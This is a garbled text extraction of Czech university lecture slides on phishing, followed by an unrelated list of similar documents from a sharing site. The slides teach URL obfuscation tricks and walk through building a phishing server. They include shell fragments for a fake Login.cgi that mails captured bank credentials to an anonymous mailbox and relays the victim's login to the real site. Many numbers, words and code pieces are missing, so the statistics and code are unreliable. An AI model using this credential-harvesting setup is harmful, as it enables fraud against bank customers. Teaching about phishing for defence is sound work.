Počítačové viry a bezpečnost počítačových systémů. Phishing

Rozměr: px
Začít zobrazení ze stránky:

Download "Počítačové viry a bezpečnost počítačových systémů. Phishing"

Transkript

1 ! Počítačové viry a bezpečnost počítačových systémů Phishing prof. Ing. Ivan Zelinka, Ph.D. Department of Computer Science Faculty of Electrical Engineering and Computer Science VŠB-TUO 17. listopadu Ostrava-Poruba Czech Republic! Phone: GSM: prof. Ing. Ivan Zelinka, Ph.D.

2 Schéma přednášky

3 Schéma přednášky

4 Pishing V roce 2004 byly téměř 2 miliony občanů USA vystaveny útoku virtuálních zločinců Celkové ztráty dosáhly téměř 2 miliard dolarů phishingové ů stoupá (např. v r během 6. měsících o procent Podle společnosti Symantec, poskytovatele antispamové technologie, tvořil spam 63 procenta ze 2,93 miliardy ů zachycených softwarem společnosti Brightmail AntiSpam V polovině července roku 2004 zablokovaly filtry firmy Brightmail AntiSpam 9 milionů pokusů o phishing týdně. Tento počet v prosinci 2004 přesáhl 33 miliony zablokovaných zpráv týdně

5 Pishing průběhu 24 hodin v březnu 2005 bylo 10 z 12 ů oficiálně zařazeno jako spam a každá 82. zpráva v sobě skrývala virus Pokud alespoň 1 ze příjemců skutečně zareaguje na pobídku Klepněte sem", která se objevuje ve spamech, mají spammeři dostatečný finanční stimul k tomu, aby rozeslali dalších 5 milionů spamových zpráv Phishing představuje podskupinu kategorie spamu. Mezi hlavní identifikační rysy patří: nástroj pro hromadnou poštu a jeho vlastnosti zvyky v oblasti odesílání pošty včetně konkrétních stylů a rozvrhů, ale nejen jich druh systému používaného pro rozesílání spamu (v počítači, kde se y vytvářejí) druh systému používaného pro umístění phishingového serveru v struktura nepřátelského phishingového serveru včetně využívání HTML, JS, PHP a jiných skriptů

6 Pishing

7 Spam - pishing Nevyžádaná obchodní elektronická pošta (UCE) Neodpovídající obchodní elektronická pošta (NCE) Producenti seznamů Samy Scamy tvoří největší část spamu. Jejich účelem je získání významných finančních prostředků prostřednictvím oklamání uživatelů. Mezi podskupiny scamu patří 419 (scam nigerijského typu), malware a phishing.

8 Pishing Podle Internet Storm Center vydrží čistá schránka pod Windows bez jakékoli záplaty na Internetu odolávat průměrně 20 minut Pishing je definován jako primitivní metoda, jako způsob odeslání falšovaného upříjemci, který klamavým způsobem napodobuje legální instituci s úmyslem vyzvědět od příjemce důvěrné informace jako číslo platební karty nebo heslo k bankovnímu účtu. Takový většinou navádí uživatele, aby navštívil nějaké webové stránky a zadal zde tyto důvěrné informace. Tyto stránky mají design podobný jako instituce, za kterou se scammer vydává, aby získal vaši důvěru. Stránky této instituci samozřejmě nepatří a výsledkem je ukradení vašich důvěrných údajů za účelem finančního zisku. Proto je slovo phishing evidentně variací na slovo fishing (rybaření), kde scammer nakazuje háčky" v naději, že se do nich pár jeho obětí zakousne".

9 Pishing Příklad : matení oka Jednoduchým příkladem je Webový prohlížeč přečte pravou stranu adresy a přejde na Google. v prohlížeči většinou indikuje uživatelské jméno a heslo, podobně jako u FTP. V případě, že se nezadá, je bezvýznamný. FTP přihlášení ve webovém prohlížeči může vypadat nějak takhle: Aby to phisher ještě více zkomplikoval, zmate URL jeho nečitelným zakódováním. To lze provést mnoha způsoby. Nejdříve vyhledáme IP adresu pro Google, která je např Dále konvertujme řetězec do DWord (Double Word). Word je normální počet bitů, který je vyhovující pro provádění operací u konkrétní architektury. U architektury Intel je tímto počtem 16 bitů, takže Double Word bude 32 bitů a uvádí se v desetinné podobě. Matematicky se konverze IP adresy do DWord provede takto: (216* )*(256+57)*( ) = , čímž nás dostane na google.com

10 Pishing Lze zadat 56456/ a jsme na google.com Dále to lze ještě více zkomplikovat, šestnáctkový kód je 40. V případě URL se pro indikaci šestnáctkového kódu použije předpona %. Pakdostaneme

11 Co není phish Scam typu Nigerian 419 Tento scam, známý také jako advanced fee fraud, podvod typu vymáhání zálohového poplatku nebo také scam Ponzi, mezi nás přišel ještě před začátkem 80. let. Přichází ve formě faxu, dopisu nebo u. Podvodná internetová aukce Tyto scamy čítají až 64 % veškerých internetových podvodů a jsou hlavním druhem podvodu používaného na internetu (Internet Fraud Complaint Center,

12 Phish statistika Na Jednu hromadnou zásilku čítající ů přijme až 10 % příjemců a vynese okolo 1 % obětí. Phishers našli využití pro každý účet, který získají: od praní špinavých peněz k odcizení, podvodům a krádežím identity. Phishers zdokonalují svoje metody v oblasti key-loggingového malwaru (zaznamenávání stisku kláves). Místo sběru dat ze všech webových stránek vyhledávají data z jednotlivých URL a využívají i faktor botnetu a vyzbrojují se sami pomocí distribuovaných serverů po celém světě. Trojské koně jako Trojan.BankAsh nakazí soubory hostitelského počítače a berou si je na nepravé bankovní weby za účelem ukradení dat jejich uživatelů. Phishers využívají zranitelnost v rámci Cross-Site Scripting2 (XSS), možnosti přesměrování URL a jakékoli způsoby vykořisťování spojené s prohlížeči, které jim umožní provádět útoky za účelem získání informací o uživatelích.

13 Phish statistika Běžná metoda odhadu velikosti hromadné zásilky potřebuje využít shromážděné ové adresy: Vytvořte skupinu ových adres, které budete využívat pouze pro potřeby spamu. Obecně se jí říká spamový účet typu honeypot (úmyslně nezabezpečený systém, který umožňuje monitorovat podezřelou aktivitu). Provedte distribuci těchto ových adres do nižných míst. Tento proces se nazývá rozsévání, protože adresy z honeypotu se sází" do různých fór. Vyčkejte, dokud účty nezačnou přijímat spamy. Může to trvat hodiny i měsíce, podle daného fóra. phishing představuje 0,5 % veškerého spamu, nebo zhruba 25 milionů ů každý den.

14 Phish statistika úspěšnosti phishingu: téměř 50 % možných obětí - lidí, kteří klepnou na odkaz v u - se objeví během prvních 24 hodin po odeslání hromadné pošty v téměř 50 % možných obětí se objeví během dalších 24 hodin po odeslání hromadné pošty méně než 1 procento možných obětí vstoupí na stránku po 48 hodinách Phishingové servery, které se uzavřou během 24 hodin, mohou omezit míru návratnosti na polovinu. Naopak phishingové servery, které se neodstaví do 48 hodin, se vystavují 50% riziku, že budou během následujícího měsíce použity pro jiný phishingový útok. Doba mezi opětovným použitím se mění podle phishingových skupin - některé skupiny používají servery okamžitě znovu, jiné čekají s návratem týdny.

15 Phish statistika S během první hodiny po odeslání hromadné pošty může být až 20 % přístupů na phishingový server ze strany antiphishingových organizací. V logu to lze najít podle typu prohlížeče (wget je zřejmá indikace antiphishingové organizace) a IP adresy. Především IP adresa může vést ke známé antiphishingové skupině. V téměř 80 procent antiphishingových skupin, které na server vstoupí, tak činí během prvních 12 hodin. Po 48 hodinách patří téměř všechny přístupy antiphishingovým skupinám. Jsou to pravděpodobně skupiny, které ověřují, zda je server stále aktivní.

16 Falešná identita - zrcadlo V tomto kroku se pomocí SW robota provede stažení vybrané webové stránky. Povšimněte si souboru robots.txt, který slouží k zamezení přístupu robotů k vybraným částem stránek. Platí pouze pro roboty splňující normu RES-Robot Exclusion Standard.

17 Obsah souboru robot.txt může být například: Falešná identita - zrcadlo

18 Falešná identita - nastavení pishingového serveru

19 Falešná identita - založení anonymní schránky Všimli jste si, že jediný nepropojený odkaz vede na cgi/login.cgi? Je to náš hlavní cíl, protože zpracovává důvěrné přihlašovací údaje pro celou stránku. Nemáme přístup ke kódu cílové stránky pro Login.cgi, takže si vybudujeme svůj vlastní. Tento modifikovaný soubor Login.cgi provede dvě hlavní akce: zaznamená přihlašovací údaje, odešle je do naší anonymní schránky a zároveň odešle MITM POST zpátky na stránku s uživatelskými údaji a v zásadě se přihlásí místo něj. Tato technika MITM byla užita phishery, kteří se zaměřili na PayPal, je to diskrétní způsob, jak podfouknout oběť, aniž by si byla něčeho vědoma, jelikož jsme napojeni zpět na skutečný cíl a uživatel bude přihlášen.

20 Falešná identita - založení anonymní schránky #!/bin/sh PATH=/bin:/usr/bin:/usr/local/bin RSERVER=bank.securescience.net/bank URI='echo "${REQUEST_URI}" sed-e # Give CGI header and start web page echo "Status: 301 Moved Content- Type: text/html Location: <html> <body> This page has moved to <a href=\"http://${rserver}${uri}\">http://${rserver}${request JJRI}</a> </body> </html>" Tento kód vezme URI z REQUEST_URI a odstraní vše až k /cgi/(za předpokladu, že /cgi/ je obsaženo v URÍ) a předává výsledky do URI.

21 Falešná identita - založení anonymní schránky pro zachycení dat použijeme ovou adresu jako naši anonymní schránku, pro ukázku použijme POSTDATA='echo "${URI}" sed -e ' s/\/cgi\/login.cgi?//'' cat «! /usr/lib/sendmail -t From: ${SENDER} To: ${RECIPIENT} ${POSTDATA}!

22 Falešná identita - příprava phishingového u

23 Útok přesměrováním Pro phishingovou techniku přesměrování je standardním postupem sběr dat a přesměrování oběti na skutečnou stránku. Jedná se o jeden ze sofistikovanějších způsobů phishingového útoku, jelikož neexistuje žádná sběrná webová stránka, žádné obrázky a na jediném použitém serveru běží jen přesměrovací skript. Uživatel je vyzván k zadání svých přihlašovacích informací přímo do ové zprávy. Tento způsob phishingu je velmi populární na ebay, PayPal a elektronických obchodech jako např. Amazon. Od takových společností mnohem pravděpodobněji obdržíte ohledně výhod a nově nabízených služeb, takže napodobení postupu, který je pohodlnější pro zákazníky elektronických obchodů, je pochopitelné.

Stinnou stránkou elektronické komunikace nejsou jenom HOAXy. Josef Džubák www.hoax.cz

Stinnou stránkou elektronické komunikace nejsou jenom HOAXy. Josef Džubák www.hoax.cz Stinnou stránkou elektronické komunikace nejsou jenom HOAXy Josef Džubák www.hoax.cz HOAX? Co to je? Anglické slovo, znamená v překladu: - Mystifikace Podvod Žert Novinářská kachna Kde je začátek? Fámy

Více

Práce s e-mailovými schránkami v síti Selfnet

Práce s e-mailovými schránkami v síti Selfnet Práce s e-mailovými schránkami v síti Selfnet Obsah návodu Základní informace k nastavení schránky selfnet.cz...2 Doporučené parametry nastavení e-mailového klienta...2 Základní informace k nastavení e-mailové

Více

Aktuální hrozby internetu. 1.Trojské koně (malware) 2.Phishing 3.Sociální sítě

Aktuální hrozby internetu. 1.Trojské koně (malware) 2.Phishing 3.Sociální sítě Aktuální hrozby internetu 1.Trojské koně (malware) 2.Phishing 3.Sociální sítě Trojské koně Viz předchozí hodina. Škodlivý program, který v počítači vytváří podmínky pro přijímání dalších škodlivých programů.

Více

Jen technická ochrana nestačí. Ing. Jindřich Hlaváč, CISA hlavac@dcit.cz DCIT, a.s., http://www.dcit.cz

Jen technická ochrana nestačí. Ing. Jindřich Hlaváč, CISA hlavac@dcit.cz DCIT, a.s., http://www.dcit.cz Jen technická ochrana nestačí Ing. Jindřich Hlaváč, CISA hlavac@dcit.cz DCIT, a.s., http://www.dcit.cz Statistika nuda je Statistika technologií 98 % uživatelů PC používá antivirový program 70 % uživatelů

Více

E-mail Outlook Express

E-mail Outlook Express E-mail Outlook Express název anotace očekávaný výstup druh učebního materiálu druh interaktivity Elektronická pošta Prezentace je zaměřena na seznámení žáků s elektronickou komunikací. Žáci se seznámí

Více

Nejzajímavější bezpečnostní incidenty CSIRT.CZ. Pavel Bašta pavel.basta@nic.cz 29.01.2015

Nejzajímavější bezpečnostní incidenty CSIRT.CZ. Pavel Bašta pavel.basta@nic.cz 29.01.2015 Nejzajímavější bezpečnostní incidenty CSIRT.CZ Pavel Bašta pavel.basta@nic.cz 29.01.2015 CSIRT.CZ Národní CSIRT tým pro ČR Založen v rámci plnění grantu MV ČR Kybernetické hrozby z hlediska bezpečnostních

Více

CISCO CCNA I. 8. Rizika síťového narušení

CISCO CCNA I. 8. Rizika síťového narušení CISCO CCNA I. 8. Rizika síťového narušení Základní pojmy Rizika Devastace sítě Ztráta dat a důležitých informací Ztráta kontroly nad sítí Následnéčasové ztráty Krádež dat Ztráta identity (bankovní operace

Více

Škodlivý kód, útok na aplikace. Ing. Miloslav Hub, Ph.D. 5. prosince 2007

Škodlivý kód, útok na aplikace. Ing. Miloslav Hub, Ph.D. 5. prosince 2007 Škodlivý kód, útok na aplikace Ing. Miloslav Hub, Ph.D. 5. prosince 2007 Viry (1) Nejstaršíforma škodlivého kódu. Základní funkce: Šíření Destrukce Techniky šíření: Bootovacíviry z diskety Souborové viry

Více

Příručka rychlého nastavení snímání do e-mailu

Příručka rychlého nastavení snímání do e-mailu Xerox WorkCentre M118i Příručka rychlého nastavení snímání do e-mailu 701P42710 Tato příručka představuje pohotovou referenci k nastavení funkce snímání do e-mailu na přístroji. Naleznete v ní tyto postupy:

Více

Příručka nastavení funkcí snímání

Příručka nastavení funkcí snímání Příručka nastavení funkcí snímání WorkCentre M123/M128 WorkCentre Pro 123/128 701P42171_CS 2004. Všechna práva vyhrazena. Uplatňovaná ochrana autorských práv se vztahuje na všechny formy a záležitosti

Více

Webové hrozby KDO 6.5.2008

Webové hrozby KDO 6.5.2008 Webové hrozby KDO 6.5.2008 INFOSEC informační bezpečnost Fyzická bezpečnost (PHYSEC) Počítačová bezpečnost (COMPUSEC) Personální bezpečnost (PERSEC) Komunikačni bezpečnost (COMSEC) Logická bezpečnost (LOGISEC)

Více

Gymnázium a Střední odborná škola, Rokycany, Mládežníků 1115

Gymnázium a Střední odborná škola, Rokycany, Mládežníků 1115 Gymnázium a Střední odborná škola, Rokycany, Mládežníků 1115 Číslo projektu: Číslo šablony: 27 Název materiálu: Ročník: Identifikace materiálu: Jméno autora: Předmět: Tématický celek: Anotace: CZ.1.07/1.5.00/34.0410

Více

Postup nastavení bezpečné E-mailové schránky pro zákazníky Logicentra

Postup nastavení bezpečné E-mailové schránky pro zákazníky Logicentra Postup nastavení bezpečné E-mailové schránky pro zákazníky Logicentra Důvod přidělování speciálních schránek. Podle posledních statistik kolem 90 % všech E-mailů na Internetu tvoří nevyžádaná pošta. Patří

Více

Už ivatelska dokumentace

Už ivatelska dokumentace Už ivatelska dokumentace Aplikace Portál úspěšných projektů je určena k publikování informací o projektech realizovaných za přispění některého z Operačních programů v gesci Ministerstva vnitra České republiky.

Více

EUROPEAN COMPUTER DRIVING LICENCE / INTERNATIONAL COMPUTER DRIVING LICENCE - IT Security SYLABUS 1.0 (M12)

EUROPEAN COMPUTER DRIVING LICENCE / INTERNATIONAL COMPUTER DRIVING LICENCE - IT Security SYLABUS 1.0 (M12) EUROPEAN COMPUTER DRIVING LICENCE / INTERNATIONAL COMPUTER DRIVING LICENCE - IT Security SYLABUS 1.0 (M12) Upozornění: Oficiální znění ECDL/ICDL Sylabu IT Security 1.0 je publikováno na webových stránkách

Více

Jednorázová hesla pro zvýšení bezpečnosti vzdáleného přístupu mobilních uživatelů

Jednorázová hesla pro zvýšení bezpečnosti vzdáleného přístupu mobilních uživatelů Jednorázová hesla pro zvýšení bezpečnosti vzdáleného přístupu mobilních uživatelů Jedním z řešení bezpečného vzdáleného přístupu mobilních uživatelů k firemnímu informačnímu systému je použití technologie

Více

Tematický celek: Základy hardware a sítí. Učivo (téma): Hrozby internetu škodlivé programy

Tematický celek: Základy hardware a sítí. Učivo (téma): Hrozby internetu škodlivé programy Označení materiálu: VY_32_INOVACE_IKT_K_55 Autor: Jaromír Škrabal Tematický celek: Základy hardware a sítí Učivo (téma): Hrozby internetu škodlivé programy www.zlinskedumy.cz Stručná charakteristika Materiál

Více

Uživatel počítačové sítě

Uživatel počítačové sítě Uživatel počítačové sítě Intenzivní kurz CBA Daniel Klimeš, Ivo Šnábl Program kurzu Úterý 8.3.2005 15.00 18.00 Teoretická část Středa 9.3.2005 15.00 19.00 Praktická práce s počítačem Úterý 15.3.2005 15.00

Více

Informační a komunikační technologie. 1.5 Malware

Informační a komunikační technologie. 1.5 Malware Informační a komunikační technologie 1.5 Malware Učební obor: Kadeřník, Kuchař-číšník Ročník: 1 Malware ( malicius - zákeřný) Mezi tuto skupinu patří: Viry Červi Trojské koně Spyware Adware... a další

Více

Vzhled a popis hlavních funkcí systému SMSbrána.cz

Vzhled a popis hlavních funkcí systému SMSbrána.cz Vzhled a popis hlavních funkcí systému SMSbrána.cz www.smsbrana.cz Hlavní stránka a přihlášení do systému 4 Neogenia s.r.o. +420 5 9 260 info@smsbrana.cz www.neogenia.cz Odesílač SMS Nejdůležitější část

Více

Bezpečnost a virová problematika

Bezpečnost a virová problematika Počítačový virus: Program, který se dokáže šířit sám a bez vědomí uživatele. Vznik již na přelomu 60. a 70. let 20. stol. Vkládá vlastní škodlivý kód do jiných spustitelných souborů, dokumentů. Musí se

Více

Autorizační systém Uživatelská příručka pro Samoobslužnou aplikaci

Autorizační systém Uživatelská příručka pro Samoobslužnou aplikaci Autorizační systém Uživatelská příručka pro Samoobslužnou aplikaci Obsah 1 Základní informace o aplikaci... 2 2 Uživatelský účet... 2 2.1 Dodatečná autentizace... 2 2.2 Aktivace nově založeného uživatelského

Více

PRO TRAVEL CK, s.r.o. Prokopova 23, 301 00 Plzeň Tel.: 377 919 202 E-mail: info@protravel.cz Internet: www.protravel.cz

PRO TRAVEL CK, s.r.o. Prokopova 23, 301 00 Plzeň Tel.: 377 919 202 E-mail: info@protravel.cz Internet: www.protravel.cz MANUÁL K PŘIHLAŠOVACÍMU SYSTÉMU PRO TRAVEL CK, s.r.o. Prokopova 23, 301 00 Plzeň Tel.: 377 919 202 E-mail: info@protravel.cz Internet: www.protravel.cz 1 PŘÍSTUP DO SYSTÉMU Přímo na http://rezervace.protravel.cz

Více

Uživatelská příručka. Chráníme více lidí před více online hrozbami než kdokoli jiný na světě.

Uživatelská příručka. Chráníme více lidí před více online hrozbami než kdokoli jiný na světě. Uživatelská příručka Chráníme více lidí před více online hrozbami než kdokoli jiný na světě. Chraňte své životní prostředí. Je to správné. Společnost Symantec odstranila z tohoto návodu obálku, aby snížla

Více

ZVLÁŠTNÍ PODMÍNKY SDÍLENÉHO HOSTINGU

ZVLÁŠTNÍ PODMÍNKY SDÍLENÉHO HOSTINGU ZVLÁŠTNÍ PODMÍNKY SDÍLENÉHO HOSTINGU Verze ze dne 15. 2. 2011 ČLÁNEK 1 PŘEDMĚT 1.1 Tyto zvláštní podmínky mají za cíl definovat technické a finanční podmínky, za kterých se OVH.CZ zavazuje umístit na své

Více

Hromadný e-mail / Newsletter

Hromadný e-mail / Newsletter . Hromadný e-mail / Newsletter Tato funkce slouží pro hromadné rozesílání personifikovaných e-mailů vybraným skupinám zákazníků ze stromu zatřídění nebo výběru. Obsahuje spoustu zajímavých funkcí, jako

Více

Internet Banka v mobilu

Internet Banka v mobilu Internet Banka v mobilu Obsah Co je Internet Banka v mobilu?... 3 Co umí Internet Banka v mobilu?... 3 Kdo může používat Internet Banku v mobilu?... 3 Na jakých telefonech Internet Banka v mobilu funguje?...

Více

XTB VPS. XTB Virtual Private Server manuál

XTB VPS. XTB Virtual Private Server manuál XTB VPS XTB Virtual Private Server manuál Poslední aktualizace: 12/9/2012 Obsah manuálu 1 Úvod... 3 2 Správa serveru... 3 2.1 Přihlášení do administrace serveru... 3 2.2 Karta Obecné... 4 2.2.1 Okno Akce

Více

Použití Office 365 na iphonu nebo ipadu

Použití Office 365 na iphonu nebo ipadu Použití Office 365 na iphonu nebo ipadu Úvodní příručka Kontrola e-mailů iphone nebo ipad si můžete nastavit tak, aby odesílal a přijímal poštu z vašeho účtu Office 365. Kontrola kalendáře z libovolného

Více

Elektronické podání žádosti o udělení výjimky pro použití konvenčních osiv v ekologickém zemědělství prostřednictvím Portálu farmáře MZe

Elektronické podání žádosti o udělení výjimky pro použití konvenčních osiv v ekologickém zemědělství prostřednictvím Portálu farmáře MZe Uživatelská příručka Elektronické podání žádosti o udělení výjimky pro použití konvenčních osiv v ekologickém zemědělství prostřednictvím Portálu farmáře MZe Ministerstvo zemědělství České republiky únor

Více

Inovace výuky prostřednictvím ICT v SPŠ Zlín, CZ.1.07/1.5.00/34.0333 Vzdělávání v informačních a komunikačních technologií

Inovace výuky prostřednictvím ICT v SPŠ Zlín, CZ.1.07/1.5.00/34.0333 Vzdělávání v informačních a komunikačních technologií VY_32_INOVACE_31_19 Škola Název projektu, reg. č. Vzdělávací oblast Vzdělávací obor Tematický okruh Téma Tematická oblast Název Autor Vytvořeno, pro obor, ročník Anotace Přínos/cílové kompetence Střední

Více

Ing. Přemysl Brada, MSc., Ph.D. Ing. Martin Dostal. Katedra informatiky a výpočetní techniky, FAV, ZČU v Plzni

Ing. Přemysl Brada, MSc., Ph.D. Ing. Martin Dostal. Katedra informatiky a výpočetní techniky, FAV, ZČU v Plzni Webové aplikace Ing. Přemysl Brada, MSc., Ph.D. Ing. Martin Dostal Katedra informatiky a výpočetní techniky, FAV, ZČU v Plzni Harmonogram Dopolední blok 9:00 12:30 Ing. Dostal Úvod, XHTML + CSS Ing. Brada,

Více

VY_32_INOVACE_IKTO2_1960 PCH

VY_32_INOVACE_IKTO2_1960 PCH VY_32_INOVACE_IKTO2_1960 PCH VÝUKOVÝ MATERIÁL V RÁMCI PROJEKTU OPVK 1.5 PENÍZE STŘEDNÍM ŠKOLÁM ČÍSLO PROJEKTU: CZ.1.07/1.5.00/34.0883 NÁZEV PROJEKTU: ROZVOJ VZDĚLANOSTI ČÍSLO ŠABLONY: III/2 DATUM VYTVOŘENÍ:

Více

Jak nastavit poštu v síti SPKFree

Jak nastavit poštu v síti SPKFree Jak nastavit poštu v síti SPKFree V poslední době se množí dotazy kolem pošty. Ti, kteří je kladou jsou bohužel ztraceni a vůbec nechápou základní věci. Ti, kteří odpovídají šílí, jak někdo může nevědět

Více

PRO TRAVEL CK, s.r.o. Prokopova 23, 301 00 Plzeň Tel.: 377 919 202 E-mail: info@protravel.cz Internet: www.protravel.cz

PRO TRAVEL CK, s.r.o. Prokopova 23, 301 00 Plzeň Tel.: 377 919 202 E-mail: info@protravel.cz Internet: www.protravel.cz MANUÁL K PŘIHLAŠOVACÍMU SYSTÉMU PRO TRAVEL CK, s.r.o. Prokopova 23, 301 00 Plzeň Tel.: 377 919 202 E-mail: info@protravel.cz Internet: www.protravel.cz 1 PŘÍSTUP DO SYSTÉMU Přímo na http://rezervace.protravel.cz

Více

REGISTRACE UŽIVATELE

REGISTRACE UŽIVATELE OBCHODOVÁNÍ S POVOLENKAMI REJSTŘÍK UNIE REGISTRACE UŽIVATELE Stručná uživatelská příručka Obsah Spuštění aplikace... 2 Přihlášení a odhlášení... 3 Vytvoření uživatelského účtu ECAS a přidání čísla mobilního

Více

Počítačová bezpečnost Aktualizace OS a aplikačních programů Firewall a další bezpečnostní nástroje

Počítačová bezpečnost Aktualizace OS a aplikačních programů Firewall a další bezpečnostní nástroje Počítačová bezpečnost aktualizace operačního systému a aplikačních programů firewall a další bezpečnostní nástroje počítačové viry a červy, spyware metody útoků přes webové stránky a elektronickou poštu

Více

Mgr. Stěpan Stěpanov, 2013

Mgr. Stěpan Stěpanov, 2013 Mgr. Stěpan Stěpanov, 2013 Co to je počítačový spam? Otázka 1 Počítačový virus Masově šířená zpráva Šunka, prodávaná online Druh spywaru Odpověď 1 Počítačový spam je nevyžádané masově šířené mediální sdělení,

Více

Poznámky k oficiálním cvičným testům pro modul M12

Poznámky k oficiálním cvičným testům pro modul M12 Poznámky k oficiálním cvičným testům pro modul M12 Testovací platforma Software o MS Word 2007 až 2010. o Operační systém Windows (XP, 7) o Antivirový program, v němž je možno provést test jedné konkrétní

Více

2.přednáška. Informační bezpečnost: Systém řízení informační bezpečnosti (ISMS)

2.přednáška. Informační bezpečnost: Systém řízení informační bezpečnosti (ISMS) Systém řízení informační bezpečností: Úvod RNDr. Igor Čermák, CSc. Katedra počítačových systémů Fakulta informačních technologií České vysoké učení technické v Praze Igor Čermák, 2011 Informační bezpečnost,

Více

Příručka Google Cloud Print

Příručka Google Cloud Print Příručka Google Cloud Print Verze A CZE Definice poznámek V celé příručce uživatele je použit následující styl poznámek: Poznámky uvádějí, jak reagovat na situaci, která může nastat, nebo poskytují tipy,

Více

HLEDEJCENY.mobi. Obsah. Mobilní verze e-shopu. Důvody instalace

HLEDEJCENY.mobi. Obsah. Mobilní verze e-shopu. Důvody instalace Obsah HLEDEJCENY.mobi Mezi Vodami 1952/9 e-mail: info@hledejceny.cz HLEDEJCENY.mobi... 1 Mobilní verze e-shopu... 1 Důvody instalace... 1 Výhody... 2 Co je k mobilní verzi potřeba... 2 Objednávka služby...

Více

Provozní dokumentace. Seznam orgánů veřejné moci. Příručka pro běžného uživatele

Provozní dokumentace. Seznam orgánů veřejné moci. Příručka pro běžného uživatele Provozní dokumentace Seznam orgánů veřejné moci Příručka pro běžného uživatele Vytvořeno dne: 7. 7. 2011 Aktualizováno: 11. 2. 2015 Verze: 2.2 2015 MVČR Obsah Příručka pro běžného uživatele 1 Úvod...3

Více

Antivirové programy, Firewally, AntiSpywary, AntiSpamy

Antivirové programy, Firewally, AntiSpywary, AntiSpamy Antivirové programy, Firewally, AntiSpywary, AntiSpamy Antivirové programy aneb jak zabezpečit svůj počítač. Základní definice Antivirový program sleduje všechny nejpodstatnější vstupní/výstupní místa,

Více

Co je to sociální síť?

Co je to sociální síť? Sociální sítě Co je to sociální síť? Sociální síť je webová služba, která umožňuje jednotlivcům: vybudování veřejného nebo poloveřejného profilu v omezeném systému vytvořit seznam uživatelů, s nimiž něco

Více

Uživatelská příručka pro. elektronické podání žádosti o uznání porostů. přístup k výsledkům přehlídek uznávacího řízení

Uživatelská příručka pro. elektronické podání žádosti o uznání porostů. přístup k výsledkům přehlídek uznávacího řízení Uživatelská příručka pro elektronické podání žádosti o uznání porostů a přístup k výsledkům přehlídek uznávacího řízení prostřednictvím Portálu farmáře verze: 1.0 Strana 1 (celkem 14) Vytvořeno dne 3.1.2011

Více

www.dpd.cz/dobirky Uživatelský manuál

www.dpd.cz/dobirky Uživatelský manuál www.dpd.cz/dobirky Uživatelský manuál DPD CZ Obsah 1. Úvod... 3 2. Přihlášení... 3 Přihlášení... 3 Nový uživatel, zapomenuté heslo... 5 3. Nastavení... 6 Nastavení uživatele... 6 Nastavení bankovních účtů...

Více

POKYNY K REGISTRACI PROFILU ZADAVATELE

POKYNY K REGISTRACI PROFILU ZADAVATELE POKYNY K REGISTRACI PROFILU ZADAVATELE Stav ke dni 4. 12. 2012 Obsah: 1 Úvod... 3 1.1 Podmínky provozu... 3 1.2 Pokyny k užívání dokumentu... 3 2 Registrace profilu zadavatele... 4 2.1 Přihlášení uživatele...

Více

Obsah: 1. Přihlašovací okno a přihlášení do systému Zobrazení osobní stránky strávníka a jídelního lístku

Obsah: 1. Přihlašovací okno a přihlášení do systému Zobrazení osobní stránky strávníka a jídelního lístku Obsah: 1. Přihlašovací okno a přihlášení do systému 2. Zobrazení osobní stránky strávníka a jídelního lístku 3. Funkce tlačítek hlavní lišty a jejich popis 3.1 informační lišta uživatel a kredit 3.2 funkce

Více

Etapa I první kontakt

Etapa I první kontakt Průvodce pro používání webových stránek www.doczech.pl Níže najdete základní informace, které Vám umožní začít používat naše webové stránky. I. První kontakt II. Vytvoření uživatelského účtu III. Přidání

Více

Šifrování Autentizace Bezpečnostní slabiny. Bezpečnost. Lenka Kosková Třísková, NTI TUL. 22. března 2013

Šifrování Autentizace Bezpečnostní slabiny. Bezpečnost. Lenka Kosková Třísková, NTI TUL. 22. března 2013 Šifrování Autentizace ní slabiny 22. března 2013 Šifrování Autentizace ní slabiny Technologie Symetrické vs. asymetrické šifry (dnes kombinace) HTTPS Funguje nad HTTP Šifrování s pomocí SSL nebo TLS Šifrování

Více

MƏj úĭet Uživatelský manuál Verze 1.01/2010

MƏj úĭet Uživatelský manuál Verze 1.01/2010 M j ú et Uživatelský manuál Verze 1.01/2010 Obsah 1 Přihlášení do aplikace Klientské centrum.......................................................................................... 4 2 Zprávy systému...................................................................................................................

Více

Informace o poštovním provozu na serveru mail.ktkadan.cz a stručný návod na použití OpenWebMailu

Informace o poštovním provozu na serveru mail.ktkadan.cz a stručný návod na použití OpenWebMailu Informace o poštovním provozu na serveru mail.ktkadan.cz a stručný návod na použití OpenWebMailu 1. Obecné informace Příchozí zprávy se ukládají do vaší schránky na serveru mail.ktkadan.cz. Tuto schránku

Více

1. Přihlášení do aplikace... 3. 2. Změna hesla... 4. 3. Zapomenuté heslo... 4. 4. Přístup pro neregistrované zákazníky... 5

1. Přihlášení do aplikace... 3. 2. Změna hesla... 4. 3. Zapomenuté heslo... 4. 4. Přístup pro neregistrované zákazníky... 5 M-COM s.r.o. Jana Růžičky 1165/2A telefon: +420 242 405 220 148 00 Praha 4, Czech Republic e-mail: info@m-com.cz www.m-com.cz Uživatelská příručka k webovému rozhraní aplikace M-COM Service Desk Autoři:

Více

Nastavení tabletu Apple ipad

Nastavení tabletu Apple ipad Nastavení tabletu Apple ipad Tablet Apple ipad, zakoupený v prodejní síti společnosti T-Mobile Czech Republic a.s., má potřebné parametry pro použití T-Mobile služeb již přednastaveny. Pokud je potřeba

Více

Úvod do informačních služeb Internetu

Úvod do informačních služeb Internetu Úvod do informačních služeb Internetu Rozdělení počítačových sítí Počítačové sítě se obecně rozdělují do základních typů podle toho, na jak velkém území spojují počítače a jaké spojovací prostředky k tomu

Více

Elektronické bankovnictví IV. čtvrtek, 31. května 12

Elektronické bankovnictví IV. čtvrtek, 31. května 12 Elektronické bankovnictví IV. Hrozby elektronického bankovnictví Slepá důvěra a hloupost = možnost zneužití sociálního inženýrství Phishing Vážený kliente, obracíme se na Vás se žádostí ověření vašeho

Více

F-Secure Anti-Virus for Mac 2015

F-Secure Anti-Virus for Mac 2015 F-Secure Anti-Virus for Mac 2015 2 Obsah F-Secure Anti-Virus for Mac 2015 Obsah Kapitola 1: Začínáme...3 1.1 Správa registrace...4 1.2 Jak se lze ujistit, že je počítač chráněn...4 1.2.1 Ikony stavu ochrany...4

Více

Uživatelská dokumentace

Uživatelská dokumentace Uživatelská dokumentace k projektu Czech POINT Provozní řád Žádost o výpis nebo opis z Rejstříku trestů podle zákona č. 124/2008 Sb. Vytvořeno dne: 11.4.2007 Aktualizováno: 25.5.2010 Verze: 4.3 2009 MVČR

Více

Kaspersky ONE. univerzální zabezpečení. Ochrana různých zařízení

